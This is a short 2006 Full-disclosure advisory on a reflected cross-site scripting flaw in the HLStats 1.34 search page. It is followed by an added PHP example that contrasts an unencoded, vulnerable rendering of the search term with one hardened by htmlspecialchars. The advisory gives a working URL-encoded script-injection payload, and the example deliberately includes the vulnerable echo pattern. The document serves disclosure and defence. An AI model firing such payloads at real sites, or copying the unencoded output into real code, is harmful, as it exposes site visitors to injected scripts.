[Full-disclosure] XSS in HLStats 1.34
From: kefka (kefka at kevinbeardsucks.com)
Date: Tue Aug 29 2006 - 02:47:29 CDT
Cross-site Scripting Vulnerability in HLStats 1.34
hlstats.php?mode=search&game=cstrike&st=player&q=%22%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E%22
Search module fails to sanitize quotes.
kefka
kefka at kevinbeardsucks.com
Thanks to RSnake
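
The mitigation for the reflected `q` parameter reported above, as an added example that is not part of the original post and is not HLStats source code. The `render_search_vulnerable`, `render_search_hardened` and `h` functions are hypothetical, and the assumption that the search term is echoed into both an attribute value and body text is made for illustration only.

```php
<?php
// Added illustration; the render_* helpers are hypothetical, not HLStats code.

// Query string from the advisory, parsed the way PHP would populate $_GET.
parse_str(
    'mode=search&game=cstrike&st=player'
    . '&q=%22%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E%22',
    $params
);

// Before: the search term is echoed back unencoded (assumed sinks:
// an attribute value and a text node).
function render_search_vulnerable(array $p): string
{
    $q = $p['q'] ?? '';
    return '<input type="text" name="q" value="' . $q . '">' . "\n"
         . '<p>Results for: ' . $q . '</p>';
}

// Encode for HTML output; ENT_QUOTES covers both " and ' so the value
// cannot close the surrounding attribute.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// After: same markup, every reflected value encoded at output time.
function render_search_hardened(array $p): string
{
    // Treat array-valued input (q[]=...) as empty instead of passing it on.
    $q = is_string($p['q'] ?? null) ? $p['q'] : '';
    return '<input type="text" name="q" value="' . h($q) . '">' . "\n"
         . '<p>Results for: ' . h($q) . '</p>';
}

$before = render_search_vulnerable($params);
$after  = render_search_hardened($params);

// Report whether a raw <script> tag survives in each rendering.
var_dump(stripos($before, '<script>') !== false);
var_dump(stripos($after, '<script>') !== false);
echo $after, "\n";
```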